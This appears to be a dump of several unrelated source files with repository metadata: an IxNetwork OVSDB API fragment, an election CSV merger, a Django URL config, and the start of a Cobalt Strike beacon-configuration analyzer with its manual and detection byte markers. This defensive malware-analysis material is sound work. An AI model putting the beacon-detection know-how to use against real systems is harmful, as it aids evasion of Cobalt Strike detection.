        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('controllerDumpDB', payload=payload, response_object=None)
def DeleteServer(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[List[str], None]
    """Executes the deleteServer operation on the server.

    Delete Server.

    deleteServer(Arg2=list, async_operation=bool)list
    - Arg2 (list(number)): List of indices for which to Delete Server.
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.
    - Returns list(str): ID to associate each async action invocation

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is the href of this resource; positional args fill Arg2..ArgN.
    payload = {"Arg1": self.href}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('deleteServer', payload=payload, response_object=None)
def DumpDB(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[List[str], None]
    """Executes the dumpDB operation on the server.

    Attach.

    dumpDB(Arg2=list, async_operation=bool)list
    - Arg2 (list(number)): List of indices into the device group.
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.
    - Returns list(str): ID to associate each async action invocation

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is the href of this resource; positional args fill Arg2..ArgN.
    payload = {"Arg1": self.href}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('dumpDB', payload=payload, response_object=None)
def GetServerAddDeleteStatus(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[List[str], None]
    """Executes the getServerAddDeleteStatus operation on the server.

    Get Server Status.

    getServerAddDeleteStatus(Arg2=list, async_operation=bool)list
    - Arg2 (list(number)): List of indices for which to get Server Status.
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.
    - Returns list(str): ID to associate each async action invocation

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is the href of this resource; positional args fill Arg2..ArgN.
    payload = {"Arg1": self.href}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('getServerAddDeleteStatus', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the restartDown operation on the server.

    Stop and start interfaces and sessions that are in Down state.

    The IxNetwork model allows multiple signatures for this method:
    restartDown(async_operation=bool)
    restartDown(SessionIndices=list, async_operation=bool)
    restartDown(SessionIndices=string, async_operation=bool)
    - SessionIndices: session numbers as a list (e.g. [1, 2, 3]) or as a
      range string (e.g. '1-4;6;7-12').
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is this object itself; positional args fill Arg2..ArgN.
    payload = {"Arg1": self}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('restartDown', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the start operation on the server.

    Start CPF control plane (equals to promote to negotiated state).

    The IxNetwork model allows multiple signatures for this method:
    start(async_operation=bool)
    start(SessionIndices=list, async_operation=bool)
    start(SessionIndices=string, async_operation=bool)
    - SessionIndices: session numbers as a list (e.g. [1, 2, 3]) or as a
      range string (e.g. '1-4;6;7-12').
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is this object itself; positional args fill Arg2..ArgN.
    payload = {"Arg1": self}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the stop operation on the server.

    Stop CPF control plane (equals to demote to PreValidated-DoDDone state).

    The IxNetwork model allows multiple signatures for this method:
    stop(async_operation=bool)
    stop(SessionIndices=list, async_operation=bool)
    stop(SessionIndices=string, async_operation=bool)
    - SessionIndices: session numbers as a list (e.g. [1, 2, 3]) or as a
      range string (e.g. '1-4;6;7-12').
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is this object itself; positional args fill Arg2..ArgN.
    payload = {"Arg1": self}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('stop', payload=payload, response_object=None)
def get_device_ids(self, PortNames=None, ClearDumpDbFiles=None, ConnectionType=None, ControllerTcpPort=None, DirectoryName=None, DumpdbDirectoryName=None, EnableOvsdbServerIp=None, ErrorCode=None, ErrorDesc=None, ErrorLogDirectoryName=None, ErrorLogicalSwitchName=None, ErrorPhysicalSwitchName=None, ErrorTimeStamp=None, FileCaCertificate=None, FileCertificate=None, FileHWGatewayCertificate=None, FilePrivKey=None, HSCConfiguration=None, OvsdbSchema=None, OvsdbServerIp=None, ServerConnectionIp=None, TableNames=None, VerifyHWGatewayCertificate=None, VerifyPeerCertificate=None):
    """Base class infrastructure that gets a list of ovsdbcontroller device ids encapsulated by this object.

    Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.

    Args
    ----
    - PortNames (str): optional regex of port names
    - ClearDumpDbFiles (str): optional regex of clearDumpDbFiles
    - ConnectionType (str): optional regex of connectionType
    - ControllerTcpPort (str): optional regex of controllerTcpPort
    - DirectoryName (str): optional regex of directoryName
    - DumpdbDirectoryName (str): optional regex of dumpdbDirectoryName
    - EnableOvsdbServerIp (str): optional regex of enableOvsdbServerIp
    - ErrorCode (str): optional regex of errorCode
    - ErrorDesc (str): optional regex of errorDesc
    - ErrorLogDirectoryName (str): optional regex of errorLogDirectoryName
    - ErrorLogicalSwitchName (str): optional regex of errorLogicalSwitchName
    - ErrorPhysicalSwitchName (str): optional regex of errorPhysicalSwitchName
    - ErrorTimeStamp (str): optional regex of errorTimeStamp
    - FileCaCertificate (str): optional regex of fileCaCertificate
    - FileCertificate (str): optional regex of fileCertificate
    - FileHWGatewayCertificate (str): optional regex of fileHWGatewayCertificate
    - FilePrivKey (str): optional regex of filePrivKey
    - HSCConfiguration (str): optional regex of hSCConfiguration
    - OvsdbSchema (str): optional regex of ovsdbSchema
    - OvsdbServerIp (str): optional regex of ovsdbServerIp
    - ServerConnectionIp (str): optional regex of serverConnectionIp
    - TableNames (str): optional regex of tableNames
    - VerifyHWGatewayCertificate (str): optional regex of verifyHWGatewayCertificate
    - VerifyPeerCertificate (str): optional regex of verifyPeerCertificate

    Returns
    -------
    - list(int): A list of device ids that meets the regex criteria provided in the method parameters

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # _get_ngpf_device_ids() consumes this function's locals() directly,
    # so no additional local variables may be introduced here.
    return self._get_ngpf_device_ids(locals())
| [
"[email protected]"
] | |
b7bad42217740964a6c56c458b83e77dcb6f7ac0 | 22102fe3aadaabb967b9a0e33af5ea624afdaa38 | /merge.py | 6c48c87b8644f6c9004bdadef6fdc3dcc8e4f93d | [
"MIT"
] | permissive | tecoholic/Election2021 | 1c840a0e7ba23c885ca07ab9e676087fb312189f | 0b3fb8930d09883f5b58584f6f14b02d30788cbf | refs/heads/main | 2023-04-30T22:20:37.406868 | 2021-05-14T11:17:16 | 2021-05-14T11:17:16 | 363,843,846 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | py | import os
import pandas as pd

# Number of assembly constituencies per state/UT code (Assam, Kerala,
# Puducherry, Tamil Nadu, West Bengal) — used as the per-state file count.
states = {
    "AS": 126,
    "KL": 140,
    "PY": 30,
    "TN": 234,
    "WB": 294
}
def get_code(party):
    """Derive a short party code from a party name.

    Rules: "None of the Above" (any case) maps to "NOTA"; the substring
    "of " is dropped (so "Communist Party of India" -> "CPI"); each
    remaining word contributes its first letter, except parenthesised
    words which contribute "(X)" from their first and last characters.

    Args:
        party: Full party name as it appears in the results CSV.

    Returns:
        Upper-cased party code string.
    """
    if party.lower() == "none of the above":
        return "NOTA"
    party = party.replace("of ", "")  # handle CPIM
    # Filter out empty tokens so doubled/trailing spaces cannot cause an
    # IndexError when taking p[0] below.
    parts = [p.strip() for p in party.split(" ") if p.strip()]
    return "".join(
        p[0] if not p.startswith("(") else p[0:2] + p[-1]
        for p in parts
    ).upper()
def main():
    """Merge each state's per-constituency CSV files into one all_candidate.csv.

    For every state in the module-level ``states`` mapping, reads
    may2021/<state>/<n>.csv for n = 1..constituency-count, annotates each row
    with the constituency number (AC_NO), the candidate's rank by total votes
    (Position) and a derived party code, then writes the concatenation to
    may2021/<state>/all_candidate.csv. Missing input files are reported and
    skipped.
    """
    for state in states:
        print("Merging files of ", state)
        base_dir = os.path.join("may2021", state)
        frames = []
        for i in range(1, states[state] + 1):
            filename = os.path.join(base_dir, f"{i}.csv")
            try:
                data = pd.read_csv(filename)
            except FileNotFoundError:
                print("Cannot find file: ", filename)
                continue
            data["AC_NO"] = i
            data["Position"] = data["Total Votes"].rank(
                ascending=False).astype('int')
            data["Party Code"] = data["Party"].apply(get_code)
            frames.append(data)
        # DataFrame.append was deprecated and removed in pandas 2.0;
        # a single concat is also faster than appending frame-by-frame.
        df = pd.concat(frames) if frames else None
        fname = os.path.join(base_dir, "all_candidate.csv")
        df.to_csv(fname, index=False)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
450884b464f60b3e241efe035f78dab576018545 | 56aa30f949f9e66bce9b7351d72cf76a65e8cd33 | /config/urls.py | 486d4479c5a6cb420fffdd8d1f3b3df2f07eba70 | [
"MIT"
] | permissive | bfssi-forest-dussault/food_list_db | 5684677aa9df6cd30fd81ae4a16940af34b32190 | 76d2d56a9948f41cf67f5a1c6612c2726bd0b8b7 | refs/heads/master | 2022-12-11T22:38:49.250432 | 2020-09-10T20:17:10 | 2020-09-10T20:17:10 | 294,507,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,886 | py | from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import include, path
from django.views import defaults as default_views
from django.views.generic import TemplateView
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path("", TemplateView.as_view(template_name="pages/home.html"), name="home"),
path(
"about/", TemplateView.as_view(template_name="pages/about.html"), name="about"
),
# Django Admin, use {% url 'admin:index' %}
path(settings.ADMIN_URL, admin.site.urls),
# User management
path("users/", include("food_list_db.users.urls", namespace="users")),
path("accounts/", include("allauth.urls")),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# API URLS
urlpatterns += [
# API base url
path("api/", include("config.api_router")),
# DRF auth token
path("auth-token/", obtain_auth_token),
]
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
path(
"400/",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
path(
"403/",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
path(
"404/",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
path("500/", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [path("__debug__/", include(debug_toolbar.urls))] + urlpatterns
| [
"[email protected]"
] | |
c342af77f7076aebe55ba2cc939f06cccaabe9c9 | 137832600734c4a3a16966bbaba19d3540378f9a | /1768.py | d44ef2d1bd2a0adbdd61901b7614ced2cfa29e10 | [] | no_license | DidierStevens/DidierStevensSuite | e824354c80f5b7aae4dfb6e55f60178eb9ae208c | 8190354314d6f42c9ddc477a795029dc446176c5 | refs/heads/master | 2023-09-01T20:11:55.341694 | 2023-08-29T10:26:39 | 2023-08-29T10:26:39 | 35,275,445 | 1,670 | 554 | null | 2023-06-04T22:54:40 | 2015-05-08T11:21:00 | Python | UTF-8 | Python | false | false | 112,042 | py | #!/usr/bin/env python
from __future__ import print_function
__description__ = 'Analyze Cobalt Strike beacons'
__author__ = 'Didier Stevens'
__version__ = '0.0.19'
__date__ = '2023/04/27'
"""
Source code put in the public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2019/05/15: start
2019/05/18: continue
2019/05/25: continue
2019/12/06: continue
2019/12/07: continue
2019/12/17: continue
2020/02/03: 0.0.2 some changes for CS4: xor key is '.' in stead of 'i'
2020/10/11: 0.0.3 Python 3 fixes
2020/10/17: improve parsing
2020/10/18: updated some config identifiers: found https://github.com/JPCERTCC/aa-tools https://github.com/sysopfb/malware_decoders/tree/master/cs_beacon https://github.com/Sentinel-One/CobaltStrikeParser
2020/10/21: Python 3 fix in cBinaryFile
2020/10/28: refactoring
2020/10/29: man
2020/11/04: added xor chain decoding
2020/11/07: 0.0.4 updated shellcode analysis
2020/11/12: updated shellcode analysis
2020/11/16: added option -l
2020/11/17: continue
2020/11/29: added rule_shellcode_00_end
2021/02/13: 0.0.5 updated shellcode analysis (+ Python 3 fix); added XORChain analysis for PE sections; remove duplicate configs when dumping raw
2021/03/06: added option -c
2021/03/25: 0.0.6 fix for provided sample
2021/04/06: fix
2021/04/28: added option -J
2021/04/30: CS version guessing
2021/05/02: fix
2021/05/15: continue JSON output
2021/06/14: updated man with 1768.json info
2021/10/10: 0.0.8 1768.json improvements
2021/10/17: 0.0.9 added malleable instructions decoding
2021/11/01: refactoring instructions decoding
2021/11/05: 0.0.10 cOutput replacements
2021/11/07: added FinalTests
2021/11/14: added DNS fields
2021/11/17: added missing field names (ebook FINDING BEACONS IN THE DARK)
2021/12/12: 0.0.11 added 1768b.json support
2022/02/22: 0.0.12 added private key to 1768.json (provided by alexzorila); fix json output; pyzipper support
2022/04/15: 0.0.13 added option -H and IdentifyShellcode
2022/04/16: continue IdentifyShellcode
2022/05/20: 0.0.14 skipping 0x20 bytes
2022/07/31: 0.0.15 update class cAPIOptions
2022/08/17: added option --sanitycheck; refactored FinalTests
2022/08/20: 0.0.16 added output instructions to JSON output
2022/08/30: 0.0.17 added option -x
2023/04/02: updated man page
2023/04/03: 0.0.18 cleanup debugging
2023/04/27: 0.0.19 added LSFIF
Todo:
"""
import optparse
import sys
import os
import binascii
import random
import gzip
import collections
import glob
import textwrap
import re
import struct
import string
import math
import fnmatch
import json
import time
import hashlib
try:
import pyzipper as zipfile
except ImportError:
import zipfile
if sys.version_info[0] >= 3:
from io import BytesIO as DataIO
else:
from cStringIO import StringIO as DataIO
if sys.version_info[0] >= 3:
from io import StringIO
else:
from cStringIO import StringIO
try:
import pefile
import peutils
except ImportError:
print('Missing pefile and/or peutils Python module, please check if it is installed.')
sys.exit()
def PrintManual():
manual = r'''
Manual:
1768 Kelvin is the melting point of the metal cobalt.
This tool decrypts and dumps the configuration of Cobalt Strike Windows beacons (PE files), shellcode and memory dumps.
Use option -x to try all 256 xor keys for the configuration (not only 0x2e and 0x69).
Option -s (--select) can be used to select a particular configuration item (by decimal of hexadecimal number) for more information. For the moment, this option displays the complete item's data (hexadecimal in cleartext, encoded with 'i' (0x69) and encoded with '.' (0x2e). These hexadecimal values can be used to create detection rules, like YARA rules.
Option -l (--licenseid) is used to generate YARA rules to detect a beacon or shellcode with the given license ID. The id can be provided as an integer or an hexadecimal value (prefixed by 0x).
More than one license id can be provided: separate them by commas (,).
Each license id can be previded by a name for the license is (use : as a separator).
Example : 1768.py -l ATP_1:12345678,pentester_2:87654321
Option -c (--csv) is used to output the config parameters in CSV format.
Option -J (--jsonoutput) is used to output the config parameters in JSON format.
Use option -H to display the hashes of the analyzed file.
Option -S (--sanitycheck) performs a sanity check on the extracted configuration, and ignores the extracted configuration when it does not pass a sanity check.
The sanity check checks for the presence of config values 1 and 7, and check if their values are plausible:
1 -> known payload type
7 -> public key starts with 308
Option -V (--verbose) produces more output:
- verbosity for config values (like the private key for leaked keys)
- hex/ascii dump of found signatures
When a signature is found, the longest ASCII string in front of the signature (256 bytes span) is included, like this:
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x122f12d31 (LSFIF: b'!#ALF:Y2V:Elastic/HKTL_CobaltStrike_Beacon_4_2_Decrypt')
LSFIF is abbreviation Longest String Found In Front.
A JSON file with name 1768.json placed in the same directory as 1768.py will be used to enhance fields with information, like the license-id field.
It reads one or more files or stdin. This tool is very versatile when it comes to handling files, later full details will be provided.
This Python script was first developed with Python 2.7 and tested with Python 2.7 and 3.7, now it is developed with Python 3.9 and tested with Python 3.9.
As stated at the beginning of this manual, this tool is very versatile when it comes to handling files. This will be explained now.
This tool reads files in binary mode. It can read files from disk, from standard input (stdin) and from "generated" files via the command line.
It can also partially read files (this is done with the cut operator).
If no file arguments are provided to this tool, it will read data from standard input (stdin). This way, this tool can be used in a piped chain of commands, like this:
oledump.py -s 4 -d sample.doc.vir | tool.py
When one or more file arguments are provided to this tool, it will read the files and process the content.
How the files are read, depends on the type of file arguments that are provided. File arguments that start with character @ or # have special meaning, and will be explained later.
If a file argument does not start with @ or #, it is considered to be a file on disk and the content will be read from disk.
If the file is not a compressed file, the binary content of the file is read from disk for processing.
Compressed files are solely recognized based on their extension: .zip and .gz.
It uses built-in Python module zipfile, unless module pyzipper is installed. Module pyzipper adds AES support, and can be installed with pip (Python 3 only).
If a file argument with extension .gz is provided, the tool will decompress the gzip file in memory and process the decompressed content. No checks are made to ensure that the file with extension .gz is an actual gzip compressed file.
If a file argument with extension .zip is provided and it contains a single file, the tool will extract the file from the ZIP file in memory and process the decompressed content. No checks are made to ensure that the file with extension .zip is an actual ZIP compressed file.
Password protected ZIP files can be processed too. The tool uses password 'infected' (without quotes) as default password. A different password can be provided using option --password.
Example:
tool.py sample.zip
To prevent the tool from decompressing .zip or .gz files, but to process the compressed file itself, use option --noextraction.
File arguments that start with character @ ("here files"), are read as text files that contain file arguments (one per line) to be processed.
For example, we take a text file with filename list.txt and following content:
sample-1.bin
sample-5.bin
sample-7.bin
When using this file (list.txt) in the following command:
tool.py @list.txt
the tool will process the following files: sample-1.bin, sample-5.bin and sample-7.bin.
A single @ character as filename is a here file read from stdin.
Wildcards are supported too. The classic *, ? and [] wildcard characters are supported. For example, use the following command to process all .exe and .dll files in the Windows directory:
tool.py C:\Windows\*.exe C:\Windows\*.dll
To prevent the tool from processing file arguments with wildcard characters or special initial characters (@ and #) differently, but to process them as normal files, use option --literalfilenames.
The content of folders can be processed too: use option --recursedir and provide folder names as argument. Wildcards and here files (for folder names) can be used too.
File arguments that start with character # have special meaning. These are not processed as actual files on disk (except when option --literalfilenames is used), but as file arguments that specify how to "generate" the file content.
File arguments that start with #, #h#, #b# or #e# are used to "generate" the file content.
Arguments that start with #c# are not file arguments, but cut operators (explained later).
Arguments that start with #f# are not file arguments, but flags (explained later).
Generating the file content with a # file argument means that the file content is not read from disk, but generated in memory based on the characteristics provided via the file argument.
When a file argument starts with # (and not with #h#, #b#, #e# or #c#), all characters that follow the # character specify the content of the generated file.
For example, file argument #ABCDE specifies a file containing exactly 5 bytes: ASCII characters A, B, C, D and E.
Thus the following command:
tool.py #ABCDE
will make the tool process data with binary content ABCDE. #ABCDE is not an actual file written on disk, but it is a notational convention to provide data via the command line.
Since this notation can not be used to specify all possible byte values, hexadecimal encoding (#h#) and BASE64 encoding (#b#) notation is supported too.
For example, #h#4142434445 is an hexadecimal notation that generates data ABCDE. Hexadecimal notation allows the generation of non-printable characters for example, like NULL bytes: #h#00
File argument #b#QUJDREU= is another example, this time BASE64 notation, that generates data ABCDE.
File arguments that start with #e# are a notational convention to use expressions to generate data. An expression is a single function/string or the concatenation of several functions/strings (using character + as concatenation operator).
Strings can be characters enclosed by single quotes ('example') or hexadecimal strings prefixed by 0x (0xBEEF).
4 functions are available: random, loremipsum, repeat and chr.
Function random takes exactly one argument: an integer (with value 1 or more). Integers can be specified using decimal notation or hexadecimal notation (prefix 0x).
The random function generates a sequence of bytes with a random value (between 0 and 255), the argument specifies how many bytes need to be generated. Remark that the random number generator that is used is just the Python random number generator, not a cryptographic random number generator.
Example:
tool.py #e#random(100)
will make the tool process data consisting of a sequence of 100 random bytes.
Function loremipsum takes exactly one argument: an integer (with value 1 or more).
The loremipsum function generates "lorem ipsum" text (fake latin), the argument specifies the number of sentences to generate.
Example: #e#loremipsum(2) generates this text:
Ipsum commodo proin pulvinar hac vel nunc dignissim neque eget odio erat magna lorem urna cursus fusce facilisis porttitor congue eleifend taciti. Turpis duis suscipit facilisi tristique dictum praesent natoque sem mi egestas venenatis per dui sit sodales est condimentum habitasse ipsum phasellus non bibendum hendrerit.
Function chr takes one argument or two arguments.
chr with one argument takes an integer between 0 and 255, and generates a single byte with the value specified by the integer.
chr with two arguments takes two integers between 0 and 255, and generates a byte sequence with the values specified by the integers.
For example #e#chr(0x41,0x45) generates data ABCDE.
Function repeat takes two arguments: an integer (with value 1 or more) and a byte sequence. This byte sequence can be a quoted string of characters (single quotes), like 'ABCDE' or an hexadecimal string prefixed with 0x, like 0x4142434445.
The repeat function will create a sequence of bytes consisting of the provided byte sequence (the second argument) repeated as many times as specified by the first argument.
For example, #e#repeat(3, 'AB') generates byte sequence ABABAB.
When more than one function needs to be used, the byte sequences generated by the functions can be concatenated with the + operator.
For example, #e#repeat(10,0xFF)+random(100) will generate a byte sequence of 10 FF bytes followed by 100 random bytes.
The cut argument (or cut operator) allows for the partial selection of the content of a file. This argument starts with #c# followed by a "cut-expression". Use this expression to "cut out" part of the content.
The cut-argument must be put in front of a file argument, like in this example:
tool.py #c#0:100l data.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data.bin.
A cut argument is applied to all file arguments that follow it. Example:
tool.py #c#0:100l data-1.bin data-2.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data-1.bin and the first 100 bytes file data-2.bin.
More than one cut argument can be used, like in this example:
tool.py #c#0:100l data-1.bin #c#0:200l data-2.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data-1.bin and the first 200 bytes (0:200l) of file data-2.bin.
A cut-expression is composed of 2 terms separated by a colon (:), like this:
termA:termB
termA and termB can be:
- nothing (an empty string)
- a positive decimal number; example: 10
- an hexadecimal number (to be preceded by 0x); example: 0x10
- a case sensitive ASCII string to search for (surrounded by square brackets and single quotes); example: ['MZ']
- a case sensitive UNICODE string to search for (surrounded by square brackets and single quotes prefixed with u); example: [u'User']
- an hexadecimal string to search for (surrounded by square brackets); example: [d0cf11e0]
If termA is nothing, then the cut section of bytes starts with the byte at position 0.
If termA is a number, then the cut section of bytes starts with the byte at the position given by the number (first byte has index 0).
If termA is a string to search for, then the cut section of bytes starts with the byte at the position where the string is first found. If the string is not found, the cut is empty (0 bytes).
If termB is nothing, then the cut section of bytes ends with the last byte.
If termB is a number, then the cut section of bytes ends with the byte at the position given by the number (first byte has index 0).
When termB is a number, it can have suffix letter l. This indicates that the number is a length (number of bytes), and not a position.
termB can also be a negative number (decimal or hexademical): in that case the position is counted from the end of the file. For example, :-5 selects the complete file except the last 5 bytes.
If termB is a string to search for, then the cut section of bytes ends with the last byte at the position where the string is first found. If the string is not found, the cut is empty (0 bytes).
No checks are made to assure that the position specified by termA is lower than the position specified by termB. This is left up to the user.
Search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an instance (a number equal to 1 or greater) to indicate which instance needs to be taken. For example, ['ABC']2 will search for the second instance of string 'ABC'. If this instance is not found, then nothing is selected.
Search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an offset (+ or - a number) to add (or substract) an offset to the found instance. This number can be a decimal or hexadecimal (prefix 0x) value. For example, ['ABC']+3 will search for the first instance of string 'ABC' and then select the bytes after ABC (+ 3).
Finally, search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an instance and an offset.
Examples:
This cut-expression can be used to dump the first 256 bytes of a PE file located inside the file content: ['MZ']:0x100l
This cut-expression can be used to dump the OLE file located inside the file content: [d0cf11e0]:
A flag argument starts with #f# and is passed on for all files that are provided after the flag argument. It can be used to change the behavior of the tool for certain files.
Example:
tool.py data-1.bin #f#-l data-2.bin
data-2.bin will be processed differently (using flag option -l) than file data-1.bin.
With option --jsoninput, the tool will parse the output produced by another tool using option --jsonoutput.
Example:
zipdump.py --jsonoutput Book1.xlsm | file-magic.py --jsoninput
[Content_Types].xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
_rels/.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/_rels/workbook.xml.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/workbook.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/drawings/drawing1.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/worksheets/_rels/sheet1.xml.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/theme/theme1.xml XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
xl/styles.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/worksheets/sheet1.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/vbaProject.bin Composite Document File V2 Document, Cannot read section info
xl/drawings/vmlDrawing1.vml ASCII text, with CRLF line terminators
docProps/app.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/ctrlProps/ctrlProp1.xml XML 1.0 document, ASCII text, with CRLF line terminators
docProps/core.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
In this example, zipdump is used to produce JSON data with the content of each file contained inside file Book1.xlsm (a ZIP container), which is then consumed by file-magic.py to identify (libmagic) the type of each file.
With option --ignoreprocessingerrors, the tool will continue processing the next file when an error occurs while processing the current file. Files that can not be opened will always be skipped to move to the next file.
Option --logfile direct the tool to create a logfile, and option --logcomment can be used to add a comment to the log file. The log file will contain metadata and a list of processed files, it does not contain processing results.
It is best to use this option when option --ignoreprocessingerrors is used, to have a record of file processing errors.
The lines are written to standard output, except when option -o is used. When option -o is used, the lines are written to the filename specified by option -o.
Filenames used with option -o starting with # have special meaning.
#c#example.txt will write output both to the console (stdout) and file example.txt.
#g# will write output to a file with a filename generated by the tool like this: toolname-date-time.txt.
#g#KEYWORD will write output to a file with a filename generated by the tool like this: toolname-KEYWORD-date-time.txt.
Use #p#filename to display execution progress.
To process several files while creating seperate output files for each input file, use -o #s#%f%.result *.
This will create output files with the name of the inputfile and extension .result.
There are several variables available when creating separate output files:
%f% is the full filename (with directory if present)
%b% is the base name: the filename without directory
%d% is the directory
%r% is the root: the filename without extension
%ru% is the root made unique by appending a counter (if necessary)
%e% is the extension
#h# is like the head command: only the first 10 lines will be outputed.
#t# is like the tail command: only the last 10 lines will be outputed.
Most options can be combined, like #ps# for example.
#l# is used for literal filenames: if the output filename has to start with # (#example.txt for example), use filename #l##example.txt for example.
'''
for line in manual.split('\n'):
print(textwrap.fill(line, 79))
DEFAULT_SEPARATOR = ','
QUOTE = '"'
START_CONFIG = b'\x00\x01\x00\x01\x00\x02'
START_CONFIG_I = b'ihihik'
START_CONFIG_DOT = b'././.,'
ERROR_NO_CONFIG = 'Error: config not found'
ERROR_SANITY_CHECK = 'Error: config does not pass sanity check'
def PrintError(*args, **kwargs):
    """Print a message to standard error; same interface as built-in print()."""
    print(*args, file=sys.stderr, **kwargs)
#Convert 2 Bytes If Python 3
def C2BIP3(string):
    """Convert a str to bytes under Python 3; pass through unchanged on Python 2."""
    if sys.version_info[0] <= 2:
        return string
    return bytes(ord(character) for character in string)
#Convert 2 String If Python 3
def C2SIP3(bytes):
    """Convert a bytes value to str under Python 3; pass through on Python 2."""
    if sys.version_info[0] <= 2:
        return bytes
    return ''.join(map(chr, bytes))
#Convert 2 Integer If Python 2
def C2IIP2(data):
    """Return an integer byte value: identity on Python 3, ord() on Python 2."""
    return data if sys.version_info[0] > 2 else ord(data)
def P23Ord(value):
    """Ordinal helper for Python 2/3: ints pass through, anything else goes through ord()."""
    return value if type(value) == int else ord(value)
# CIC: Call If Callable
def CIC(expression):
if callable(expression):
return expression()
else:
return expression
# IFF: IF Function
def IFF(expression, valueTrue, valueFalse):
if expression:
return CIC(valueTrue)
else:
return CIC(valueFalse)
#-BEGINCODE cBinaryFile------------------------------------------------------------------------------
#import random
#import binascii
#import zipfile
#import gzip
#import sys
#if sys.version_info[0] >= 3:
# from io import BytesIO as DataIO
#else:
# from cStringIO import StringIO as DataIO
def LoremIpsumSentence(minimum, maximum):
    """Return one fake-latin sentence of between minimum and maximum random words.

    Uses the (non-cryptographic) random module; the first word is
    capitalized and the sentence ends with a period.
    """
